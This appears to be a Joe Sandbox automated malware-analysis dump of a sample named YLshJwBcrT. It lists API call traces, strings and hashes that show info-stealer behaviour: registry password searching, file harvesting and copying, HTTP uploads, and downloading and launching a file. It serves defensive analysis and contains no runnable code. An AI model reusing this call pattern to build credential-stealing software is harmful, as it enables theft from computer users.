                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022F9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022F0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022F0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction ID: ac176967de5fb3867c6909c9e6af5ed693eddf65447b3a085c33d8ad4c29ab4d
                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction Fuzzy Hash: 0061C2B5520318ABCB14EBE0CD55FEDB33AAF54304F0041A9E70A66085EF746B88CF59
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022E4B7C
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E4BA1
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E4D21
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022E504F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022E506B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022E507F
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E50B0
                                  • InternetCloseHandle.WININET(00000000), ref: 022E5114
                                  • InternetCloseHandle.WININET(00000000), ref: 022E512C
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E4D7C
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022E5136
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID:
                                  • API String ID: 2402878923-0
                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction ID: 428fb1100e1cadadf9836ee14c8428e5761dbd7bdab5e8ca480bdcbb685a5d21
                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction Fuzzy Hash: B4120172920318AADB55EBD4DD61FEEF37ABF24700F5041A9A20A62194DF742F88CF51
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022E6664
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022E66D4
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6756
                                  • InternetCloseHandle.WININET(00000000), ref: 022E6760
                                  • InternetCloseHandle.WININET(00000000), ref: 022E676A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID:
                                  • API String ID: 3074848878-0
                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction ID: 16035b640c0b77a34e830471f83ccd06d1a59b4b07deb65ff81c87adbe2a1765
                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction Fuzzy Hash: E1718175A60318ABDF24DFE0CC55BEEB779FB04700F5041A9E20A6B194DBB46A84CF41
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022F92D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID:
                                  • API String ID: 2244384528-0
                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction ID: b0434be742c0746a594443f5d8fea33a4f3366bf1a05af96f231236494e43c4f
                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction Fuzzy Hash: 5271FBB9A50208ABDB14DFE4DC94FEEB7BAFF49700F108118F605A7294DB74A944CB61
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                  • memset.MSVCRT ref: 0041716A
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                  • sA, xrefs: 00417111
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 224852652-2614523144
                                  • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                  • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022F77A9
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022F77E6
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F786A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7871
                                  • wsprintfA.USER32 ref: 022F78A7
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$B
                                  • API String ID: 1544550907-183544611
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 6f845194738d481f2f77a7ac568bb1bcdfb6103f691d242acdd6c4b18408c96a
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: 42416EB1D50258AFDB10DFD4CC55BEEFBB9AF48700F0001A9E609A7284D7756A84CFA5
                                  APIs
                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                  • task.LIBCPMTD ref: 004076FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                  • Opcode Fuzzy Hash: 8dce06a7de27df674dc23bf429c7e28d88ca389d661d162c9425816a7145f92b
                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                  APIs
                                  • lstrcpy.KERNEL32(?,?), ref: 022F1642
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                    • Part of subcall function 022F94C7: StrStrA.SHLWAPI(?,?), ref: 022F94D3
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F167E
                                    • Part of subcall function 022F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022F94F7
                                    • Part of subcall function 022F94C7: lstrlen.KERNEL32(?), ref: 022F950E
                                    • Part of subcall function 022F94C7: wsprintfA.USER32 ref: 022F952E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F16C6
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F170E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F1755
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F179D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F17E5
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F182C
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022F1874
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                  • strtok_s.MSVCRT ref: 022F19B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                  • String ID:
                                  • API String ID: 4276352425-0
                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction ID: 18389550f3c9e082d2bd29bee8bc349f5229a06e593f3e1caf754dbf6cc559f3
                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction Fuzzy Hash: DE719BB6960318ABCB54EBF0DD88EEEB37A6F55300F0045ACE20DA2144EE755B84CF61
                                  APIs
                                  • memset.MSVCRT ref: 00407314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                  • task.LIBCPMTD ref: 00407555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                  • String ID: Password
                                  • API String ID: 2698061284-3434357891
                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                  APIs
                                  • lstrcatA.KERNEL32(?,0088A6C0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                  • lstrcatA.KERNEL32(?,00885A38), ref: 00414847
                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                  • lstrcatA.KERNEL32(?,0088B408), ref: 0041486F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID: 0aA
                                  • API String ID: 167551676-2786531170
                                  • Opcode ID: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                  • Opcode Fuzzy Hash: 1757d68d067b46057756a1022eb737b915d2dfc295090359e4600a2c9f7fad42
                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0088A588,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0088A588,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                  • __aulldiv.LIBCMT ref: 00418172
                                  • __aulldiv.LIBCMT ref: 00418180
                                  • wsprintfA.USER32 ref: 004181AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2886426298-3474575989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                    • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                    • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                    • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022E6376
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E63AE
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022E63F6
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022E641A
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 022E6443
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022E6471
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 022E64B0
                                  • InternetCloseHandle.WININET(?), ref: 022E64BA
                                  • InternetCloseHandle.WININET(00000000), ref: 022E64C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 4287319946-0
                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                  • Instruction ID: 7c7fe568c3c3bb04c8668f924665e5d52cd48b0fdf4e0d91caa5e9dd75cfee37
                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                  • Instruction Fuzzy Hash: 005160B5960318ABDF20DFD0CC54BEE7779AF04705F4080A8B606A7184DBB46A89CF95
                                  APIs
                                  • memset.MSVCRT ref: 022F4FEE
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F5017
                                  • lstrcat.KERNEL32(?,00421000), ref: 022F5034
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                    • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                  • memset.MSVCRT ref: 022F507A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F50A3
                                  • lstrcat.KERNEL32(?,00421020), ref: 022F50C0
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                    • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                    • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  • memset.MSVCRT ref: 022F5106
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F512F
                                  • lstrcat.KERNEL32(?,00421038), ref: 022F514C
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C17
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022F4C2C
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C49
                                    • Part of subcall function 022F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022F4C85
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,0064A524), ref: 022F4CB1
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022F4CC3
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CD7
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022F4CE9
                                    • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CFD
                                    • Part of subcall function 022F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022F4D13
                                    • Part of subcall function 022F4B77: DeleteFileA.KERNEL32(?), ref: 022F4D98
                                  • memset.MSVCRT ref: 022F5192
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
